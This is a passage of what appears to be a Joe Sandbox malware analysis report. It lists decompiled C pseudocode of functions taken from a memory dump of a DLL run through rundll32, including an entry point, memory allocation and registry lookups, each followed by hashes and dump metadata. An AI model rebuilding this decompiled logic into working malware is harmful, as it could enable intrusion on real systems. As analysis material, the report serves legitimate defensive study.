                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}














Memory Dump Source
• Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
• Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5fcd8103437dea3a918481c009f0c189b8672dc633c579473a60c5995b8b3d12
• Instruction ID: 1c1bf303bfb321704ef152462750934efb4406048da632ec8b839b866b00b989
• Opcode Fuzzy Hash: 5fcd8103437dea3a918481c009f0c189b8672dc633c579473a60c5995b8b3d12
• Instruction Fuzzy Hash: 38113A799002446FDF28EEB5DC407EEBBB8AB4C394F850D7ED560DA180E370C5958A10
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 37%
E031B6A56(intOrPtr __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
	unsigned int _v24;
	signed int _v28;
	void* _t11;
	unsigned int* _t12;
	signed int _t14;
	void* _t16;
	signed int _t17;
	unsigned int _t21;
	signed int _t24;
	void* _t25;
	void* _t28;
	signed int _t31;

	_t24 = __edx;
	__imp__(0, 0x400000, 0, _t25, _t28, __ecx, __ecx); // executed
	 *0x31bd238 = __eax;
	if(__eax != 0) {
		__imp__();
		E031BD1A8 = __eax;
		_t11 = E031B8F10(__eax, _a4);
		if(_t11 == 0) {
			do {
				_t12 =  &_v24;
				__imp__(_t12);
				__imp__();
				_t21 = _v24;
				_t14 = (_t21 << 0x00000020 | _v28) >> 7;
				L031BB226();
				_t31 = _t12 + _t14;
				_t16 = E031B7E03(_a4, _t31);
				_t17 = 2;
				_t23 = _t31;
				__imp__(_t17 << _t31, _t14, _t21 >> 7, 9, 0); // executed
			} while (_t16 == 1);
			if(E031B6B96(_t23) != 0) {
				 *0x31bd260 = 1; // executed
			}
			_t11 = E031B225B(_t24); // executed
		}
	} else {
		_t11 = 8;
	}
	return _t11;
}

Memory Dump Source
• Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
• Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5a9a643f767d2c73816c4d81834db673dff0841745e0ef13d14ad401d85b9b97
• Instruction ID: 1bada41adc1a81fc016c71634384abf8efbccd03408b91d47b0d6f79f5c9f322
• Opcode Fuzzy Hash: 5a9a643f767d2c73816c4d81834db673dff0841745e0ef13d14ad401d85b9b97
• Instruction Fuzzy Hash: DE11827A744300AFE728FB74EC49BAA76BD9B8C750F144529FA45CA1C4FBB0D48086B1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
• Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 913edace7791badd2d0fae7f57eb849541f25a4a0f8829a657f6b1c0ece41164
• Instruction ID: e3492671ec63c3e56ac3c4ecdea8a1c217c4aac6736a542b9efffb5376b0991e
• Opcode Fuzzy Hash: 913edace7791badd2d0fae7f57eb849541f25a4a0f8829a657f6b1c0ece41164
• Instruction Fuzzy Hash: 3301B5716453215FD234DE699C49F6BBABCEB8D650F160559F991D7240DB60C80286A0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E031B21CD(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				signed short _t11;
                                                                                                                                                                                                                                    				signed int _t12;
                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				signed short* _t21;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_t18 = 1;
                                                                                                                                                                                                                                    				_t26 = 0x31bd330;
                                                                                                                                                                                                                                    				E031B84D5();
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t8 = E031B12D4(_a4,  &_v8); // executed
                                                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                                                                                    					_t14 = 0xd;
                                                                                                                                                                                                                                    					_t15 = E031B809F(_t14);
                                                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                                                    						__imp__( *0x31bd238, 0, _v8);
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						 *_t26 = _t15;
                                                                                                                                                                                                                                    						_t26 = _t26 + 4;
                                                                                                                                                                                                                                    						_t23 = _t23 + 1;
                                                                                                                                                                                                                                    						if(_t23 < 3) {
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                                                    					E031B84D5();
                                                                                                                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                                                                                                                    						_t21 =  *0x31bd338; // 0x5169b70
                                                                                                                                                                                                                                    						_t11 =  *_t21 & 0x0000ffff;
                                                                                                                                                                                                                                    						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                                                                                                                    							_t12 = _t11 & 0x0000ffff;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_t21 = _t12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return _t18;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t18 = 0;
                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 67ed4cdb56018e0e49240e46803ec6868f2d322d3750d235b296922f9836dfe3
                                                                                                                                                                                                                                    • Instruction ID: a61f2b1bb3178150b703c9b7bebaa5d82b4efc3fab52564ac549eb17f51e6183
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67ed4cdb56018e0e49240e46803ec6868f2d322d3750d235b296922f9836dfe3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E012D396002086BE704EEEADC80FEAB2B9EB4D664F540475F9C4D6154DB75DC869330
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E031BA72D(intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                                                    				intOrPtr* _t19;
                                                                                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t28 = E031B2049(_t9, 8);
                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                    					_t11 = 8;
                                                                                                                                                                                                                                    					return _t11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t12 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    				_t2 = _t12 + 0x31be1bc; // 0x6f0072
                                                                                                                                                                                                                                    				_t14 = E031B7B5D(_t2, _a4, _t28); // executed
                                                                                                                                                                                                                                    				_t27 = _t14;
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                    					E031B9039(_t14, _t28);
                                                                                                                                                                                                                                    					return _t27;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t17 =  *_t28;
                                                                                                                                                                                                                                    				_t3 = _t28 + 4; // 0x4
                                                                                                                                                                                                                                    				_t25 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    				_t4 = _t25 + 0x31be1fc; // 0x740053
                                                                                                                                                                                                                                    				_t27 =  *((intOrPtr*)( *_t17 + 0x18))(_t17, _t4, 0, 0, _t3, 0);
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					_t19 =  *_t28;
                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t19 + 8))(_t19);
                                                                                                                                                                                                                                    					_t14 = _a4;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t14 = 0;
                                                                                                                                                                                                                                    					 *_a8 = _t28;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                    			E031B9318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				void* _v18;
                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				short _t17;
                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                    				short _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                    				_t15 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    				_t4 = _t15 + 0x31be39c; // 0x5168944
                                                                                                                                                                                                                                    				_t20 = _t4;
                                                                                                                                                                                                                                    				_t6 = _t15 + 0x31be124; // 0x650047
                                                                                                                                                                                                                                    				_t17 = E031B9152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                    				if(_t17 < 0) {
                                                                                                                                                                                                                                    					_t23 = _t17;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_v20 != 8) {
                                                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t19 = E031B9FC9(_t17, _t20, _v12);
                                                                                                                                                                                                                                    						if(_t19 == 0) {
                _t23 = 8;
            } else {
                *_a16 = _t19;
            }
            __imp__#6(_v12);
        }
    }
    return _t23;
}

Memory Dump Source
• Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
• Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8f4cb19d20bb2ae54b4beff4393387ac8bc826ca565ce7d272eb5cc8dad47086
• Instruction ID: 66f8a756c81106556f2cab4349e3f7630630c3f0f468b70b3a5e90ff7e213990
• Opcode Fuzzy Hash: 8f4cb19d20bb2ae54b4beff4393387ac8bc826ca565ce7d272eb5cc8dad47086
• Instruction Fuzzy Hash: CC019E36500119BBCB15EFB8DC44CEEBBB9FB4C710B014925EA11EA1B0D370999687B1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
E031B1262(intOrPtr* __esi, intOrPtr _a4, unsigned int _a8, char _a12) {
    signed short _t18;
    intOrPtr _t23;
    signed int _t25;
    signed short _t26;

    if(_a4 != 0) {
        _t18 = E031B9318(_a4, _a8, _a12, __esi); // executed
        _t26 = _t18;
    } else {
        _t26 = E031B6BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
        if(_t26 == 0) {
            _t25 = _a8 >> 1;
            if(_t25 == 0) {
                _t26 = 2;
                __imp__( *0x31bd238, 0, _a12);
            } else {
                _t23 = _a12;
                *(_t23 + _t25 * 2 - 2) =  *(_t23 + _t25 * 2 - 2) & _t26;
                *__esi = _t23;
            }
        }
    }
    return _t26;
}

Memory Dump Source
• Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
• Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 71cd8301f6a5b0ec3faea09413f35d4775d09b8393a27a7c54ee404949a0116d
• Instruction ID: f1b43fb387bd0f980751278f6139d41780db6b3d7242ed24b758647229300a66
• Opcode Fuzzy Hash: 71cd8301f6a5b0ec3faea09413f35d4775d09b8393a27a7c54ee404949a0116d
• Instruction Fuzzy Hash: 83016D36100249FBCB16DF84CC11FEA3BBAFB8C360F268469FA558A160D731D461CB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 37%
E031B54BC(void* __ecx) {
    signed int _v8;
    void* _t15;
    void* _t19;
    void* _t20;
    void* _t22;
    intOrPtr* _t23;

    _t23 = __imp__; // 0x76d24a00
    _t20 = 0;
    _v8 = _v8 & 0;
    *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
    _t10 = _v8;
    if(_v8 != 0) {
        _t20 = E031B2049(_t10 + 1, _t10 + 1);
        if(_t20 != 0) {
            _t15 =  *_t23(3, _t20,  &_v8); // executed
            if(_t15 != 0) {
                *((char*)(_v8 + _t20)) = 0;
            } else {
                E031B9039(_t15, _t20);
                _t20 = 0;
            }
        }
    }
    return _t20;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: ef45bdc2291adbb93cccd374a0c4bca689bda76b33c5874b31b9885225c40251
                                                                                                                                                                                                                                    • Instruction ID: dfb49921c3fac6645dc9fee09d512c931505c717f283a1eb0549c564367320b5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef45bdc2291adbb93cccd374a0c4bca689bda76b33c5874b31b9885225c40251
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5F05E26600209BBEB11D7AA9C40EEF76BEDBCE651F190069E904D7140EB70DE0287B0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E031B96A4(void* __ecx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                                                    				intOrPtr _t17;
                                                                                                                                                                                                                                    				intOrPtr _t18;
                                                                                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t10 =  *0x31bd270; // 0xd448b889
                                                                                                                                                                                                                                    				_v8 = _t10;
                                                                                                                                                                                                                                    				_v12 = _t10;
                                                                                                                                                                                                                                    				_t23 = 0; // executed
                                                                                                                                                                                                                                    				_t12 = E031B21CD(__ecx,  &_v12); // executed
                                                                                                                                                                                                                                    				if(_t12 != 0) {
                                                                                                                                                                                                                                    					_t14 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    					_t4 = _t14 + 0x31be796; // 0x74666f53
                                                                                                                                                                                                                                    					_t17 = E031B7A9A(_t4, 0);
                                                                                                                                                                                                                                    					 *0x31bd33c = _t17;
                                                                                                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                                                                                                    						_t18 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    						_v8 = _v8 ^ 0x738bb12a;
                                                                                                                                                                                                                                    						_t8 = _t18 + 0x31be862; // 0x61636f4c
                                                                                                                                                                                                                                    						_t21 = E031B7A9A(_t8, 1);
                                                                                                                                                                                                                                    						 *0x31bd344 = _t21;
                                                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                                                    							_t23 = 1;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t23;
                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f69545f57300aa8450058caacaf3006ea8dc36646199ea945334babf378ecb86
                                                                                                                                                                                                                                    • Instruction ID: c9ce0f2ea1197f4dbb2c0f2721ab1670a8800f2adba906ea615525181f6f1a82
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f69545f57300aa8450058caacaf3006ea8dc36646199ea945334babf378ecb86
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F019B9511119ABCB28EFB8E9848CAB7FCAB4C200B1541A2D501DB254F770DA468BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                    			E031B2436(intOrPtr* __edi) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				intOrPtr* _t19;
                                                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t22 = __edi;
                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                                                    				_v8 = 0x1d4c0;
                                                                                                                                                                                                                                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                                                                    				_t19 = __imp__; // 0x76d26490
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_v16 = _t15;
                                                                                                                                                                                                                                    					 *_t19(0x1f4); // executed
                                                                                                                                                                                                                                    					if(_v12 == 4) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                    						_t15 =  *((intOrPtr*)( *_t22 + 0xe0))(_t22,  &_v12);
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_v8 <= 0x1f4) {
                                                                                                                                                                                                                                    							_v16 = 0x80004004;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					return _v16;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a3886383ce1259ccbcddf447e855bc089ee2e3b12b1c96de881fbffb24d20c00
                                                                                                                                                                                                                                    • Instruction ID: 60d861cc35900832322650838bb52e5e1c487361cc49b47f6b74ce6521cf1966
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3886383ce1259ccbcddf447e855bc089ee2e3b12b1c96de881fbffb24d20c00
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8F04975C11219EFDB04DB98C488AEDB7B8EF08304F1584AAE502A7601D3B46B89CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t12 = 1;
                                                                                                                                                                                                                                    				_t4 = _a8;
                                                                                                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                                                                                                    					__imp__(0x31bd23c);
                                                                                                                                                                                                                                    					if(_t4 == 0) {
                                                                                                                                                                                                                                    						E031B970F();
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t7 = _t4 - 1;
                                                                                                                                                                                                                                    					if(_t7 == 0) {
                                                                                                                                                                                                                                    						__imp__(0x31bd23c);
                                                                                                                                                                                                                                    						if(_t7 == 1) {
                                                                                                                                                                                                                                    							_t8 = E031B6A56(_t7, _t9, _t10, _v0); // executed
                                                                                                                                                                                                                                    							if(_t8 != 0) {
                                                                                                                                                                                                                                    								_t12 = 0;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 9dcbc909a1c51166884f38017a3db077e21d73d2ee254fd042d154c6a93d8919
                                                                                                                                                                                                                                    • Instruction ID: 5786913fe6b5116b44e8fb649c8c556cce53ae5010922665c9cf1c16966ea5da
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9dcbc909a1c51166884f38017a3db077e21d73d2ee254fd042d154c6a93d8919
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8E04F7D2543A15BC739EB789844BDEB77CAB0CFD1F094454F685D4054DB10C48086E1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E031BA66E(void* __edx, void* __edi, char _a4) {
